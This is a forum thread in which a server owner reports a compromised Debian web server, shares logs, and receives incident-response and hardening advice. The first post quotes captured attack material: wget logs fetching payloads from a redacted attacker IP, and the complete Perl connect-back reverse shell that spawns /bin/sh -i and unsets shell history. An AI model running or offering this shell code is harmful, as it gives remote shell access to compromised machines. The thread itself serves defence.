Debian Lenny root server hacked with shellbot, any suggestions?

Flowsen · 09-11-2011, 01:55 PM

Dear community,
i am a new member to linuxquestions, unfortunately i have a huge problem and would like to hear your opinion on this.

My Debian Lenny root server was hacked last night. I already searched through several posts and spent some hours with investigating how the hacker came in and what he actually did.

errors.log

Quote:

--2011-09-10 20:52:30-- http://xxx.xxx.xxx.xxx/~PlcmSpIp/da1
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17205 (17K) [text/plain]
Saving to: `da1'

0K .......... ...... 100% 14.5K=1.2s

2011-09-10 20:52:32 (14.5 KB/s) - `da1' saved [17205/17205]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

6 17205 6 1171 0 0 3554 0 0:00:04 --:--:-- 0:00:04 3554
31 17205 31 5515 0 0 6681 0 0:00:02 --:--:-- 0:00:02 8758
56 17205 56 9859 0 0 5655 0 0:00:03 0:00:01 0:00:02 6144
100 17205 100 17205 0 0 6108 0 0:00:02 0:00:02 --:--:-- 6444
100 17205 100 17205 0 0 6107 0 0:00:02 0:00:02 --:--:-- 6444
sh: fetch: command not found
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
[Sat Sep 10 21:06:49 2011] [notice] mod_fcgid: process 20820 going graceful shutdown, sending SIGTERM
[Sat Sep 10 21:06:55 2011] [warn] mod_fcgid: process 20820 graceful shutdown timeouted, sending SIGKILL
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.
Can't ignore signal CHLD, forcing to default.

I removed the IP adresse, cause the malicous code is still there.
This was the Backdoor.Perl.Shellbot.r

There was another attack:

Quote:

Exception pexpect.ExceptionPexpect: ExceptionPexpect() in <bound method spawn.__del__ of <pexpect.spawn object at 0xb1fad0>> ignored
Exception pexpect.ExceptionPexpect: ExceptionPexpect() in <bound method spawn.__del__ of <pexpect.spawn object at 0xb1f9d0>> ignored
Exception pexpect.ExceptionPexpect: ExceptionPexpect() in <bound method spawn.__del__ of <pexpect.spawn object at 0xb1f9d0>> ignored
[Sat Sep 10 21:39:30 2011] [notice] mod_fcgid: process 21737 going graceful shutdown, sending SIGTERM
[Sat Sep 10 21:39:36 2011] [warn] mod_fcgid: process 21737 graceful shutdown timeouted, sending SIGKILL
--2011-09-10 21:49:26-- http://xxx.xxx.xxx.xxx/~PlcmSpIp/nc.txt
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 900 [text/plain]
Saving to: `nc.txt'

0K 100% 111M=0s

2011-09-10 21:49:27 (111 MB/s) - `nc.txt' saved [900/900]

^[0;31m[-] Conecktback Esuat^[0m

[Sat Sep 10 21:49:46 2011] [notice] mod_fcgid: process 23615 going graceful shutdown, sending SIGTERM
[Sat Sep 10 21:49:52 2011] [warn] mod_fcgid: process 23615 graceful shutdown timeouted, sending SIGKILL
--2011-09-10 21:50:48-- http://xxx.xxx.xxx.xxx/~PlcmSpIp/nc.txt
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 900 [text/plain]
Saving to: `nc.txt.1'

0K 100% 83.0M=0s

2011-09-10 21:50:48 (83.0 MB/s) - `nc.txt.1' saved [900/900]

Inside nc.txt and nc.txt.1 was the following perl code:

Code:

#!/usr/bin/perl
use Socket;
print "\n[0;33m[~] Incerc sa fac legatura =)[0m\n";
$host = $ARGV[0];
$port = 8080;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
$proto = getprotobyname('tcp') || die("[0;31m[-] Nu merge treaba[0m\n\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[0;31m[-] Eroare socket[0m\n\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("[0;31m[-] Conecktback Esuat[0m\n\n");
}
if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  print "[+] [0;32mConectback by [0;36msecure[0;32m ... private version 
=)[0m\n"; 
  system("unset HISTFILE; unset HISTSAVE ; uname -a ; id ; w ; echo \"[+] [0;32mTime to burn...[0m\";echo \"[+] [0;31mDo not fucking press Ctrl C[0m\"; /bin/sh -i");
  exit(0);
}
print "[0;32m[+] Conectback Reusit ![0m\n\n";

messages.log

Quote:

Sep 10 21:54:03 srv kernel: [8592001.493553] NET: Registered protocol family 3
Sep 10 21:54:03 srv kernel: [8592001.535504] NET: Registered protocol family 4
Sep 10 21:54:03 srv kernel: [8592001.596601] NET: Registered protocol family 5
Sep 10 21:54:03 srv kernel: [8592001.670360] NET: Registered protocol family 9
Sep 10 21:54:03 srv kernel: [8592001.670360] X.25 for Linux Version 0.2
Sep 10 21:54:03 srv kernel: [8592001.739599] SCTP: Hash tables configured (established 65536 bind 65536)

auth.log

Quote:

Sep 10 21:17:28 srv su[22604]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/1 ruser=www-data rhost= user=root
Sep 10 21:17:30 srv su[22604]: pam_authenticate: Authentication failure
Sep 10 21:17:31 srv su[22604]: FAILED su for root by www-data
Sep 10 21:17:31 srv su[22604]: - pts/1 www-data:root
Sep 10 21:17:31 srv su[22606]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/1 ruser=www-data rhost= user=root
Sep 10 21:17:32 srv su[22606]: pam_authenticate: Authentication failure
Sep 10 21:17:32 srv su[22606]: FAILED su for root by www-data
Sep 10 21:17:32 srv su[22606]: - pts/1 www-data:root
Sep 10 21:17:32 srv su[22607]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/1 ruser=www-data rhost= user=root
Sep 10 21:17:35 srv su[22607]: pam_authenticate: Authentication failure
Sep 10 21:17:35 srv su[22607]: FAILED su for root by www-data
Sep 10 21:17:35 srv su[22607]: - pts/1 www-data:root

Quote:

Sep 10 22:59:25 srv su[15313]: Successful su for news by root
Sep 10 22:59:25 srv su[15313]: + pts/1 root:news
Sep 10 22:59:25 srv su[15313]: pam_unix(su:session): session opened for user news by (uid=0)

some files with ctime changend on 10 Sep 21:56

Quote:

/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/rpm/sshOLD
/etc/rpm/sshdOLD

/opt/share
/opt/share/Ssh.bin
/opt/man/man5
/opt/man/man5/ssh_config.5
/opt/man/man5/sshd_config.5
/opt/man/man1
/opt/man/man1/scp.1
/opt/man/man1/ssh.1
/opt/man/man1/ssh-keygen.1
/opt/man/man1/ssh-agent.1
/opt/man/man1/sftp.1
/opt/man/man1/ssh-keyscan.1
/opt/man/man1/ssh-add.1
/opt/man/man1/slogin.1
/opt/man/man8
/opt/man/man8/sshd.8
/opt/man/man8/sftp-server.8
/opt/man/man8/ssh-keysign.8
/opt/libexec
/opt/libexec/sftp-server
/opt/libexec/ssh-keysign
/opt/bin
/opt/bin/ssh-keyscan
/opt/bin/sftp
/opt/bin/ssh
/opt/bin/scp
/opt/bin/slogin
/opt/bin/ssh-keygen
/opt/bin/ssh-agent
/opt/bin/ssh-add
/opt/sbin
/opt/sbin/sshd

/usr/share/phpmyadmin/scripts/setup.php

I am not sure if the attacker had complete root access but he was able to change ssh settings port etc. At the moment i mounted the old system using a second rescue system.
I am planing to restore a backup that was created before the attacks to ensure that there are no more backdors opened.
Anyway I would like to hear your opinion if the attacker had access to all data or only the apache user?

Furthermore i need to figure out which security leak i have to close after restoring the backup.
Is it a apache2 related or PHP related issue?

If you need more information, logs, versions etc please let me know.

Kind Regards
Flowsen

Noway2 · 09-12-2011, 09:34 AM

Quote:

i am a new member to linuxquestions, unfortunately i have a huge problem and would like to hear your opinion on this.

We will be happy to help. That is what we are here for.

Quote:

My Debian Lenny root server was hacked last night. I already searched through several posts and spent some hours with investigating how the hacker came in and what he actually did.

It is good that you are investigating. If you haven't already, the first thing you will want to do is isolate this machine by either disconnecting the network cable or putting up a firewall to allow only SSH access from a trusted source. You will want to disturb it as little as possible.

The next thing you will want to do, is review the CERT intruder detection check list. It outlines the steps involved in an investigation and will help you to collect and co-ordinate your thoughts.

Since you have already begun your investigation, would you please outline what you have done so far and what steps you are considering performing? It looks like you have already begun looking through the logs and looking for modified files. This is good and you actions are to be commended! I will comment on the information you have provided and then provide some commands to run to obtain additional information.

From what you have posted so far:
I am not sure I fully understand the "errors.log". It does not look like log information that I am familiar with. Would you please elaborate?
Based upon what you have posted, it looks like someone may have gotten Apache to upload a file to your system, the nc.txt (nc - netcat?) It does look like Apache may have been the initial source of the intrusion, but try to keep an open mind while performing the investigation. It looks like they used the non privileged account to then elevate to root, by password guessing. The logs shown indicate that they used the user news(?). Once they had a root privilege account, they were able to upload and modify files as desired, which it appears that they have done. The game was pretty well lost at this point. Consequently, your investigation should focus on what allowed them to gain access in the first place.

Now for some follow up questions:
1 - What distribution and revision / patch level are you running?
2 - What version of Apache are you running?
3 - What web applications are you using, e.g. PHP, and what version. Are you using any special content management applications, such as Joomla?
4 - What about remote administration tools (cpanel, plesk, mysqladmin, etc)?

I would like to ask you to obtain the output of the following commands, run as root: ps axfwwwwe, netstat -pane and lsof -Pwn. These will help to determine what applications, including counterfeit ones, are running on the system and what open connections the perpetrator is attempting.

Flowsen · 09-16-2011, 10:08 AM

Thanks a lot for your reply.

What I did in the meantime:

I did isolate the machine, made a backup of all logs to be able to have a look at them at a later point of time.
Then i rolled back a backup of the whole machine to be sure to have it clean. After this I still had it disconnected from the web to be sure not to be infected again.
I checked the versions and Apache as well as PHP was not up to date. I didnt get a notifiction nor did update/upgrade worked because the sources pointed to the old debian sources.

Now i updatet to:
apache2/lenny uptodate 2.2.9-10+lenny11
php5/lenny uptodate 5.3.8-1~dotdeb.1

I checked all open ports and files with the help of CERT checklist/your commands and everything seems to be clean now. Furthermore i have chkrootkit and rkhunter running as cronjob. At the moment hourly. SSH is only addressed to a secured VPN IP at the moment.

Quote:

I am not sure I fully understand the "errors.log". It does not look like log information that I am familiar with. Would you please elaborate?

Yes the apache error log is realy confusing. The log shows everything correct line by line. And suddenly some file is beeing downloaded (and executed). It must have been an exploit in Apache maybe together with a security hole in PHP.

You asked if something linke CMS, Joomla etc. is running. I have a lot of things on this webserver (Joomla, Magento, Mahara, Moodle, Wordpress, PhpBB, Burning Board etc.).
After updating PHP i also began to reconfigure seperate PHP settings for each Domain.

Is there a PHP Tool to check for common errors or insecure settings? I saw there was a project called PHPSecinfo that gives an output like phpinfo but with recommondations on security settings. The PHPsecinfo is datet to 2006 - so this one is useless.

Noway2 · 09-16-2011, 10:35 AM

If you were running out of date applications, it is entirely possible that there was a vulnerability that was exploited. It sounds like you had a remote file inclusion attack, of which there have been cases of with Apache. Keeping your PHP, Apache and all content management applications up to date is one of the best things that you can do. It is unfortunate, but the cracking tools can identify the version you are running and then use automated attack scripts to drop the intruder into a shell prompt. From there, one of your next best protections is to use a very good password on root and sudo privileged accounts.

If you are wanting to put this new system back on line, I would also recommned that you look into a host based intrusion detection system, such as Ossec, Tripwire, Aide, Samhain, etc. These will take a snapshot of your system and alert you via email if any critical files get changed or if there is other unusual activity.

Since you at least have the log files, you should be ale to review those for signs of the intrusion. Speaking of which, what did you find from the check list regarding unlawful applications, binaries, and modifications?

OlRoy · 09-16-2011, 12:41 PM

You never really posted all the information Noway2 requested.

Quote:

Now for some follow up questions:
1 - What distribution and revision / patch level are you running?
2 - What version of Apache are you running?
3 - What web applications are you using, e.g. PHP, and what version. Are you using any special content management applications, such as Joomla?
4 - What about remote administration tools (cpanel, plesk, mysqladmin, etc)?

I would like to ask you to obtain the output of the following commands, run as root: ps axfwwwwe, netstat -pane and lsof -Pwn. These will help to determine what applications, including counterfeit ones, are running on the system and what open connections the perpetrator is attempting.

In addition, I think the answer to how the attacker got access can be found in the access.log. If you can post the logs from around the time of the attack happened you will probably find something like an RFI attack that Noway2 suspected.

Flowsen · 09-21-2011, 09:56 AM

Dear OlRoy,

I never posted all the requested outputs as it was useless at this point. I already rolled back a backup of the whole system as removing and patching an already infected system was not a secure way for me.
As I already told i was out of date with apache2 and PHP. I searched through all apache access and error logs but wasnt able to find a suitbale log. It seems like the exploit wasnt logged. As you can see in the apache error log i posted all of a sudden there apears a terminal output.

I have my system up and running again, focusing on beeing up to date and monitoring everything right now.

The intrusion detection systems Noway2 mentioned is a good idea, I will focus on that, too. Do you have a suggestion which of these system you would recommend?

Kind Regards
Flowsen

Noway2 · 09-22-2011, 08:29 AM

It is unfortunate that you didn't complete the investigation. You may have been able to conclusively verify how you were compromised as well as gain a lot of experience with some of the less common aspects of Linux administration. I can also understand why you proceeded the way you did. The out of date applications more than likely at least contributed to or exacerbated the situation. In any case, the important thing will be for you to remain extra vigilant going forward and you will need to keep an extra close watch on your system to be sure you don't become compromised again.

As far as suggestions of what to do, there have been a few threads in the security forum regarding this subject. Here is a fairly recent one: http://www.linuxquestions.org/questi...achine-891764/

The most important thing is to start with a known clean system. Following that, here are some more suggestions: Only install the services you really need and avoid opening ports that you don't require. Apply your security in layers and keep in mind that you need to focus on each application individually. For example, for SSH don't permit direct root logins, use key based authentication (with a password on the key). At the general level, use a good, strong root password or better, pass phrase. In the advent of a compromise this could be your final line of defense making the difference between recovery and reformat. Use IPtables as a wrapper layer to ensure that your ports remain closed. Use SELinux or Apparmor to enforce an access control policy further restricting the reading/writing to directories. Use the HIDS as previously mentioned to monitor for changes. Use Logwatch to scan your logs and provide you with a daily summary of what is happening. Use applications like fail2ban and other active response tools that will shut down errant connections and dramatically slow down a would be intruder. For Apache learn and use mod_security, which will provide an active response to many forms of attacks. Make use of chroot environments where applicable, especially for services like DNS and email.

In time, you will also become aware of the general "hum" of your system and get used to how it responds as well as it's unique behaviors. If something feels out of the ordinary, pay attention to this and do some extra checks to see what has changed.

Flowsen · 09-22-2011, 08:56 AM

Thank you for your reply on this.
I already checked some of the points you mentioned and will focus on the other things in your post that I not already made to increase the security level.
SSH is currently only availible through VPN connection which is protected by SSL and keypairs.